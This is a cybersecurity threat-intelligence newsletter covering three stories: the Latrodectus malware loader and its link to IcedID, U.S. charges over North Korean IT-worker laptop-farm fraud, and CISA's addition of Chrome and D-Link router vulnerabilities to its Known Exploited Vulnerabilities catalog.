Latrodectus on the Rise: The New IcedID?
For the past few months, researchers at Elastic Security have observed an uptick in the volume of email phishing campaigns involving Latrodectus malware. First discovered by researchers around the Fall of 2023, Latrodectus is a malware loader that shares infrastructure overlap with the IcedID malware family. IcedID has been a very popular malware family introduced in 2017 as a banking trojan that also functions as a loader for other malware, including ransomware. Researchers believe Latrodectus is written by the same developers as IcedID based on the malware's functionality and the attributed threat actor groups that have been deploying it. In addition, Latrodectus itself has a command handler that specifically downloads and executes an IcedID payload. Researchers speculate this IcedID command handler could exist as a backup malware deployment in the case that Latrodectus does not perform as expected. The main function of Latrodectus is to create a foothold in the victim's machine and a connection to back to the threat actor's command-and-control (C2) server to facilitate the deployment of additional malware. The Latrodectus malware masquerades as libraries associated with legitimate software and self-deletes running files to evade detection. The most recent version of Latrodectus observed in the recent uptick of phishing campaigns can now enumerate files in the desktop directory and retrieve the entire running process hierarchy from the victim machine. The malware campaign associated with Latrodectus begins with a JavaScript dropper that leverages WMI to install an MSI file via msiexec.exe. The MSI file is remotely hosted on a WebDAV share and deploys the Latrodectus payload on execution. CTIX analysts recommend that organizations become familiar with the IOCs associated with this malware as it has the potential to become more widely used. CTIX analysts will continue to report on new and emerging forms of malware and associated campaigns.
- The Hacker News: Latrodectus Malware Loader Emerges
- Elastic: Spring Cleaning with Latrodectus
- ProofPoint: Latrodectus This Spider Bytes Like Ice
Threat Actor Activity
US and Ukrainian Individuals Arrested After Assisting North Korean Cyber Scheme
The U.S. Justice Department has charged five (5) individuals, including a U.S. citizen and a Ukrainian man, for their roles in cyber schemes designed to financially support North Korea's nuclear weapons program. The elaborate operation aimed at infiltrating the U.S. job market through fraudulent means was part of North Korea's broader strategy to raise funds for its government and illicit nuclear program. Arrests have been made in Arizona and Poland, with significant prison sentences of up to ninety-seven and a half (97.5) years for the American, Christina Chapman, and sixty-seven and a half (67.5) years for Oleksandr Didenko, the Ukrainian. The individuals were involved in the scheme between October 2020 and October 2023 and have since been charged with conspiracy to defraud the United States, aggravated identity theft, and conspiracy to commit money laundering, wire fraud, identity fraud, and bank fraud. The scheme involved the use of "laptop farms" to disguise the location of North Korean IT workers, enabling them to secure remote employment with several Fortune 500 companies across various industries, including an aerospace and defense company, a prominent television network, a "Silicon Valley" tech company, and other high-profile companies. The DOJ has also said that "Didenko is alleged to have managed as many as approximately 871 proxy identities, provided proxy accounts for three (3) freelance IT hiring platforms, and provided proxy accounts for three (3) different money service transmitters." This fraudulent activity not only compromised the identities of over sixty (60) U.S. citizens but also impacted more than three hundred (300) U.S. companies, generating at least $6.8 million in revenue for North Korea while creating false tax liabilities for dozens of Americans. In response to these revelations, the FBI has released an advisory to help companies identify and protect against similar North Korean-related threats, emphasizing the ongoing challenge of safeguarding national security against foreign cyber espionage and fraud.
Vulnerabilities
CISA Adds Google Chrome and Unsupported D-Link Router Vulnerabilities to KEV
The U.S. Cybersecurity & Infrastructure Security Agency (CISA) recently updated its Known Exploited Vulnerabilities (KEV) catalog to include three (3) security flaws: one (1) affecting Google Chrome and two (2) targeting D-Link routers. The Google Chrome vulnerability, tracked as CVE-2024-4761, involves an out-of-bounds write in the V8 JavaScript engine and is rated as highly severe, with confirmed active exploitation as of May 13, 2024. Although another related Chrome vulnerability has been exploited, it hasn't yet been added to CISA's catalog. For D-Link, the highlighted vulnerabilities include a ten-year old cross-site request forgery (CSRF) vulnerability in DIR-600 routers (CVE-2014-100005) and another bug in DIR-605 routers (CVE-2021-40655), with both models no longer supported by D-Link. These vulnerabilities allow attackers to hijack administrative controls or steal credentials. With their addition to the KEV, CISA mandates that all Federal Civilian Executive Branch (FCEB) agencies to patch or mitigate all affected devices by no later than June 6, 2024, to mitigate risks, emphasizing the ongoing threat from older, unpatched vulnerabilities often exploited by botnet malware.
The content of this article is intended to provide a general guide to the subject matter. Specialist advice should be sought about your specific circumstances.